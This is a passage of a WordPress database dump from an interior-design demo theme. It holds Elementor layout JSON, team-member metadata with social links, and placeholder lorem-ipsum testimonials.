fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"2790340\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"ef7e04a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"72ea037\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4c25ffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ffa8158\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(2295,4652,'_elementor_page_assets','a:0:{}'),(2296,4652,'_wxr_import_has_attachment_refs','1'),(2297,4653,'ova_team_met_avatar_id','925'),(2298,4653,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-05.jpg'),(2299,4653,'ova_team_met_job','Interior designer'),(2300,4653,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:20:\"https://twitter.com/\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:41:\"https://www.facebook.com/ovatheme.envato/\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.pinterest.com/\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.instagram.com/\";}}'),(2301,4653,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\n<p>Lorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.</p>\r\n\r\n<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.</p>'),(2302,4653,'ova_team_met_order_team','1'),(2303,4653,'_elementor_edit_mode','builder'),(2304,4653,'_elementor_template_type','wp-post'),(2305,4653,'_elementor_version','3.6.6'),(2306,4653,'_wp_page_template','default'),(2307,4653,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":85,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":40,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae15ef5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"470b41b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dfdd686\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5978ece\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"49a8f99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"94307b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"dfa29c0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a9753bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2bb252b\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"ebc310d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d308ac2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"51606ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f1abbd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4ae5e4e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"3802903\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"db13835\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fd33b43\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50969ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dd5a46e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(2308,4653,'_elementor_page_assets','a:0:{}'),(2309,4653,'_wxr_import_has_attachment_refs','1'),(2310,4654,'ova_team_met_avatar_id','924'),(2311,4654,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-04.jpg'),(2312,4654,'ova_team_met_job','Architecture'),(2313,4654,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:19:\"https://twitter.com\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:40:\"https://www.facebook.com/ovatheme.envato\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:25:\"https://www.pinterest.com\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:25:\"https://www.instagram.com\";}}'),(2314,4654,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\nLorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.\r\n\r\nIf you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.'),(2315,4654,'ova_team_met_order_team','1'),(2316,4654,'_elementor_edit_mode','builder'),(2317,4654,'_elementor_template_type','wp-post'),(2318,4654,'_elementor_version','3.6.6'),(2319,4654,'_wp_page_template','default'),(2320,4654,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d8b366\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a409e2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f0314d9\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute 